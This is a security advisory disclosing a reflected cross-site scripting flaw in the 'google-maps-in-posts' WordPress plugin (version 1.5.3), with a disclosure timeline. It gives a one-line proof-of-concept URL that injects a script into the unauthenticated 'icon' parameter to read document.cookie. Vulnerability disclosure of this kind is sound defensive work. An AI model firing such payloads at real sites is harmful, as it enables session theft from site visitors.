wp-plugin : google-maps-in-posts

Plugin Details
Plugin Name: wp-plugin : google-maps-in-posts
Effected Version : 1.5.3 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon"><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : icon

 

Type of XSS : Reflected


Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| Google Maps in Posts plugin for WordPress gives possibility to use Google Maps Services in your blog. That could be useful for posts in WP, describing certain locations or events, to indicate them immediately in the WP post with a map. The Google Maps Plugin gives you a simple and easy Worpress administration back end to handle multiple locations and your own location would be defined only once for all the maps of your WP blog. ]